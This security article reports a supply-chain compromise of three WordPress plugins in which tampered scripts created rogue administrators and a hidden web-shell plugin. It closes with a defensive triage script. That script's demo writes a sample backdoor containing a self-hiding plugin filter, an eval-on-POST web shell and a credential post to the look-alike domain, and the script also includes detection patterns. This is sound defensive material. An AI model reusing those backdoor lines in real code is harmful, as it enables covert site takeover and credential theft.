Recent reports describe a supply-chain compromise of three popular WordPress plugins: PushEngage, OptinMonster, and TrustPulse. Attackers tampered with JavaScript files served by these plugins, adding code that created unauthorized administrator accounts and installed a concealed backdoor on affected sites.
The code targeted logged-in site administrators. When an administrator's browser loaded the tampered script, the injected code rode that administrator's authenticated session to create a new administrator account under the attacker's control and to install a hidden plugin that gave the attacker persistent access. Visitors who were not logged in as administrators were not affected.
Security firm Sansec identified this campaign on June 13, 2026, detecting the same malicious code across the JavaScript files served by all three plugins. PushEngage, a service acquired by Awesome Motive, confirmed the breach and acknowledged that its scripts had been altered to facilitate site takeovers. As of June 15, 2026, OptinMonster and TrustPulse, also under Awesome Motive, had not issued official statements regarding the incident.
The exposure periods varied among the plugins. For OptinMonster and TrustPulse, the malicious code was present for approximately 25 minutes on June 12, 2026, between 22:17 and 22:42 UTC. In contrast, PushEngage’s scripts remained compromised for several hours on the same day, with some instances persisting until June 14, 2026.
Collectively, these plugins are installed on more than 1.2 million websites, with OptinMonster alone accounting for over a million active installations. That figure is the potential reach of the tampered scripts, not a count of compromised sites: only sites where an administrator loaded the script during the exposure window were at risk, and there is no public count of how many were actually taken over.
The mechanism amounts to session riding by a trusted third-party script. The malicious code did nothing during ordinary page views and acted only when the page was loaded in a browser logged in as an administrator. Running in that browser, it used the administrator's session to perform the following actions:
- Created a new administrator account controlled by the attacker.
- Installed a concealed plugin that does not appear in the WordPress dashboard.
- Transmitted the new account's login credentials and site information to a look-alike domain, tidio[.]cc, chosen to resemble the legitimate tidio.com.
The hidden plugin functioned as a web shell, giving the attacker remote command execution on the server. From there they could modify files, exfiltrate data, inject further malicious code, and plant additional backdoors, so restoring the tampered JavaScript alone does not return the site to a trustworthy state.
Because the backdoor plugin is hidden from the dashboard, site owners may not detect the compromise through the normal administrative interface. Administrators should inspect at the server level instead: enumerate administrator accounts directly from the database rather than through the Users screen, compare the contents of wp-content/plugins on disk with what the dashboard lists, search plugin and upload directories for references to the tidio[.]cc domain, and remove anything unexpected. After cleanup, rotate all administrator passwords and the authentication salts in wp-config.php so that stolen credentials and existing sessions stop working.
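The following script is an added example written for this article, not code from Sansec, Awesome Motive or any of the plugins, and it turns the indicators listed above into a server-side triage check: administrator accounts registered on or after the start of the exposure window, plugin files that hook WordPress's all_plugins filter to hide themselves (an assumed, commonly seen hiding technique, not confirmed for this campaign), PHP files that feed request data straight into an execution primitive (the usual shape of a web shell), and any file mentioning the look-alike domain. The sample user list and the sample plugin tree are constructed here so the script runs offline; on a real site, feed it the output of `wp user list --role=administrator --format=json` and point it at wp-content/plugins.

```python
"""Offline triage for the indicators described in the article: a new admin
account created in the exposure window, a self-hiding plugin, a web-shell
primitive, and references to the look-alike domain. Sample data is constructed."""
import json
import os
import re
import tempfile
from datetime import datetime, timezone

# Start of the exposure window given in the article (UTC). PushEngage stayed
# compromised far longer, so widen this when triaging a site that used it.
WINDOW_START = datetime(2026, 6, 12, 22, 17, tzinfo=timezone.utc)
IOC_DOMAIN = "tidio.cc"  # look-alike of tidio.com named in the article

# Assumed hiding technique: a plugin that removes itself from the dashboard's
# plugin list via the all_plugins filter. Not confirmed for this campaign.
HIDE_HOOK = re.compile(r"add_filter\(\s*['\"]all_plugins['\"]")
# PHP execution primitives fed directly from request data: a web-shell shape.
SHELL_PRIMITIVE = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec)\s*\(.*\$_(GET|POST|REQUEST|COOKIE)")

# Constructed sample of `wp user list --role=administrator --format=json`.
# wp_users.user_registered is stored by WordPress in UTC.
SAMPLE_USERS_JSON = json.dumps([
    {"ID": 1, "user_login": "owner", "user_registered": "2021-03-04 10:00:00",
     "roles": "administrator"},
    {"ID": 57, "user_login": "wp_supp0rt", "user_registered": "2026-06-12 22:31:09",
     "roles": "administrator"},
])


def suspicious_admins(users_json, window_start=WINDOW_START):
    """Logins of administrators whose account was registered at or after window_start."""
    flagged = []
    for user in json.loads(users_json):
        if "administrator" not in user.get("roles", ""):
            continue
        registered = datetime.strptime(
            user["user_registered"], "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
        if registered >= window_start:
            flagged.append(user["user_login"])
    return flagged


def scan_tree(root):
    """Walk a wp-content/plugins tree; return {relative_path: [indicator, ...]}."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue
            hits = []
            if IOC_DOMAIN in text:
                hits.append("ioc-domain")
            if name.endswith(".php") and HIDE_HOOK.search(text):
                hits.append("hides-from-plugin-list")
            if name.endswith(".php") and SHELL_PRIMITIVE.search(text):
                hits.append("webshell-primitive")
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


def demo():
    """Build a constructed plugin tree (one clean plugin, one planted hidden
    backdoor plugin) in a temp directory and scan it. Returns the findings."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    os.makedirs(os.path.join(root, "optinmonster"))
    with open(os.path.join(root, "optinmonster", "optinmonster.php"), "w") as fh:
        fh.write("<?php\n/* Plugin Name: OptinMonster */\nadd_action('init', 'om_init');\n")
    os.makedirs(os.path.join(root, "wp-sys-health"))  # hypothetical backdoor name
    with open(os.path.join(root, "wp-sys-health", "wp-sys-health.php"), "w") as fh:
        fh.write(
            "<?php\n"
            "add_filter('all_plugins', function ($p) { unset($p['wp-sys-health/wp-sys-health.php']); return $p; });\n"
            "if (isset($_POST['c'])) { @eval($_POST['c']); }\n"
            "wp_remote_post('https://tidio.cc/collect', ['body' => $creds]);\n")
    return scan_tree(root)


if __name__ == "__main__":
    print("admins created in window:", suspicious_admins(SAMPLE_USERS_JSON))
    for path, hits in sorted(demo().items()):
        print(path, "->", ", ".join(hits))
```

The account check deliberately compares registration time against the start of the window rather than its end, because an account created by a script that ran a few minutes after the tampered file was replaced (cached copies, long-lived admin tabs) is still suspicious. The pattern checks are coarse by design: they are a starting point for a manual review of each flagged file, not a verdict.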
This incident underscores the importance of supply-chain security in web development. A plugin that loads JavaScript from its vendor's servers hands that vendor's infrastructure the privileges of whoever is logged in when the script runs, so a compromise upstream becomes a compromise of every site that loads it. Website owners should keep plugins current, limit which third-party scripts load in the administrative area, and monitor for new administrator accounts and unexpected plugins, since those are the artifacts an attack like this one leaves behind.